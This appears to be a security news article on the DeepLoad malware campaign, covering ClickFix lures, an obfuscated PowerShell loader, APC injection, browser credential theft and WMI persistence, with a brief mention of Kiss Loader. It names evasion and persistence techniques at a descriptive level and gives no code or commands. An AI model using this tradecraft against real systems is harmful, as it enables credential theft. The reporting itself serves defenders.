The cybersecurity landscape has been shaken by the emergence of a new malware campaign utilizing the ClickFix technique to distribute a novel threat known as DeepLoad. According to researchers from ReliaQuest, Thassanai McCabe and Andrew Currie, this malware employs AI-driven obfuscation and process injection to bypass static defenses, initiating credential theft immediately upon deployment.
Malware Distribution via ClickFix Tactics
The attack begins with a ClickFix ploy that deceives users into executing PowerShell commands. This is cleverly disguised as a solution to a fictitious problem, prompting users to paste commands into the Windows Run dialog. Subsequently, a legitimate Windows tool, ‘mshta.exe’, is exploited to download and execute an obfuscated PowerShell loader.
The loader masks its true purpose through irrelevant variable assignments, likely developed using AI tools to evade detection by security systems. The malicious actors behind DeepLoad have designed it to seamlessly integrate with normal Windows operations, utilizing ‘LockAppHost.exe’, a legitimate process, to conceal its payload.
Advanced Evasion Techniques
DeepLoad employs several sophisticated methods to remain undetected. It disables PowerShell command history and directly calls core Windows functions, avoiding typical PowerShell monitoring. Additionally, it dynamically generates a secondary component using PowerShell’s Add-Type feature, compiling a temporary DLL with a randomized name.
Another stealth tactic involves asynchronous procedure call (APC) injection, allowing the malware to execute within trusted Windows processes without leaving a decoded payload on the disk. This method involves launching a target process in a suspended state, injecting shellcode, and resuming execution.
Credential Theft and Persistence
The primary objective of DeepLoad is to extract browser passwords from infected systems. It also deploys a malicious browser extension to intercept credentials entered on login pages, maintaining persistence unless manually removed. Moreover, the malware can detect and infect removable media, disguising itself as popular software installers to propagate.
DeepLoad’s persistence is further enhanced through Windows Management Instrumentation (WMI), enabling reinfection of clean systems without user or attacker intervention. This approach not only disrupts typical detection rules but also sets up a WMI event subscription to silently reinitiate attacks.
The revelation of DeepLoad coincides with reports from G DATA on a separate malware loader, Kiss Loader, which utilizes phishing emails and Internet Shortcut files to distribute its payload. While the prevalence of Kiss Loader remains uncertain, its developer claims origins in Malawi.
As these threats continue to evolve, it is crucial for organizations and individuals to remain vigilant and adopt robust cybersecurity measures to counteract such sophisticated malware campaigns.
